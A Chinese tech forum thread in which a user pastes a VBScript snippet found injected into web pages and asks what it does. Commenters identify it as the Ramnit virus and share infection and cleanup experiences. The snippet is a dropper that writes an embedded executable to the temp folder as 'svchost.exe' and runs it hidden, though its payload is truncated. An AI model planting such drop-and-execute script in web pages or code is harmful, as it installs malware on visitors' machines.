这是一个创建于 3634 天前的主题,其中的信息可能已经有所发展或是发生改变。
<SCRIPT Language=Vbscript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
安全不懂啊,懂的 v 友指教一下
 | 1 zhanglp888 2016-01-12 09:51:31 +08:00 Win32/Ramnit https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fRamnit dll 文件也会有问题, |
 | 2 hicdn 2016-01-12 10:30:24 +08:00 这个是在服务器上看到的还是在浏览器里看到的 |
 | 3 akafeng 2016-01-12 10:47:55 +08:00 这是运行一个文件, svchost.exe, 目测是木马 |
 | 中过这个病毒 |
 | 5 Moker 2016-01-12 10:59:31 +08:00 前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点 |
 | 6 hienchu 2016-01-12 11:18:17 +08:00 via iPhone 怎么被入侵的? |
 | 7 ibcker 2016-01-12 12:03:26 +08:00 等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 Vbscript |
 | 8 am241 2016-01-12 12:08:39 +08:00 这种病毒十年前就不好用了吧 |
 | 9 billyu 2016-01-12 12:32:40 +08:00 我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7 |
 | 11 visonme 2016-01-12 13:03:00 +08:00 |
 | 12 blakefan OP 网页木马程序 |
 | 13 prondtoo 2016-01-29 16:13:57 +08:00 刚弄好 nexpose ,有需要可以帮你扫一下。 |
Select Language